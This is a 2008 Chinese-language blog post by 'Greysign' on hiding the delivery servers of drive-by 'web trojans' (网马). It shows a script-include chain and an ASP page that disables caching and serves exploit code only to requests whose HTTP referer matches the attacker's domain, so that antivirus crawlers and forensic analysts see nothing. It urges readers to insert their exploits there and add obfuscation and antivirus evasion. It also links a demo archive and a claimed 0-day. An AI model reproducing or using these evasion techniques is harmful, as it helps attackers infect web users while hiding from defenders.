网马躯干
鬼仔注:网马中枢
Author: Greysign
2008-5-23
http://www.scanw.com/blog
余弦不久之前写了网马中枢,是关于服务端应用的一小角,他还说有其他更复杂的应用,一直等着他的BLOG更新,还是未见他写出来。最近大家都很忙。
关于网马代码,exploit固然重要,但除了exploit之外的网马框架加强对于网马功能扩展也是必然的发展趋势。网马中枢里面用了include ,读取文件等方式来隐藏EXP的地址,不过,EXP代码完全暴露出来了,那就无法阻止代码被剽窃,被取证等行为。
我已经很久没有写点什么了,就放一点服务端技术的应用和小注释吧。不是什么新技术,只是实现一些在现实中比较实用的东西,大牛赶紧飘过。
我们已经有了网马中枢了,那么,如何来隐藏我们的EXP代码以及地址呢?哈哈。这不难。跟着我的思路吧。
——————华丽地分割——————–
利用网马中枢提到的include ,读取文件这2个方式,已经可以隐藏了地址,在最后调用的HTM(last_trojan.html)写入以下代码:
document.write(“<script src=http://www.scanw.com/blog/done.asp></script>”);
/*继续调用一个JS文件*/
在done.asp里写入以下代码:
<%
Response.Buffer = True
Response.ExpiresAbsolute = Now() – 1
Response.Expires = 0
Response.CacheControl = “no-cache”
Response.AddHeader “Pragma”, “No-Cache”
Dim hr
hr=Request.ServerVariables(“HTTP_REFERER”)
If InStr(hr,”greysign”) > 0 or InStr(hr,”scanw”) > 0 Then
%>
alert(‘aaa’)
<%
End If
%>
这个代码的作用是:打开缓存,将页面设置为立即过期,Now() – 1设置不留缓存文件,这样可以在用户点后退的时候没有缓存文件可以查看,变成直接的HTTP请求,然后获取HTTP_REFERER,判断 HTTP_REFERER来源玉米是否带有我们的字符串(即判断来源网站是否是我们的网站),假如包含字符串,就执行alert(‘aaa’),假如不包 含(不是来自我们的网站的连接请求),那么就什么都不返回执行。
结合以上的所有手段,我们就实现了地址隐藏和代码隐藏了。
什么?代码哪里隐藏了?
你可以查看下原代码。只留下了调用done.asp的痕迹,你直接打开done.asp是无法看到代码的。缓存文件也没留下,杀软们去比对特征码吧……
当然了。这个只是功能的演示和思路的扩展,你可以利用几个玉米跳来跳去,把自己藏着深深地,让安全公司的爬虫抓不到你,除非他们一直把 referer记着,不断地深入追踪你。不然他们只追到其中某几级的地址就咯屁了,而且很多时候他们只有挂马页的地址,更不用说前几级的referer是 从哪个星球来的。
到了这里大家应该清楚了吧。跟ITSUN用PHP实现的隐蔽有点相似,但它还是留下了缓存给我取证。
大家有兴趣就加上cookies判断等东西,打造无敌躯干。没缓存文件对比特征,爬虫抓不到你,手工追踪狡兔三窟,cookies判断虚实不定……好吧,你说你用影音嗅探非把我的地址给揪出来。不过那是不可能的。
这样的迷踪步,我都没有把握能捕获到EXP。特别是我可不会为了一个挂马地址花上大把的时间去追踪,我又不是金田一……
所以以后拿到EXP直接往done.asp的判断里丢,有兴趣的还可以加个密免个杀变个型整个容炒个作唬个烂上个镜出个名。
不知不觉我边聊QQ边写的文章又开始唬烂了……都忘记该写什么了。好吧。。大家看演示页打包吧:
http://www.scanw.com/ggtest/demo.rar
在此先讲2件事,有人叫我大G或者G大,其实这中间有误会,我叫小G,而大G和G大的叫法应该是大GG和GG大演变来的。
更多关于网马的内容请关注知道安全
最后放了个联众的0DAY在这里。http://www.0x37.com/Project/webtrojan/index.htm
追得到最后代码的人,就拿走吧~提示:referer欺骗。
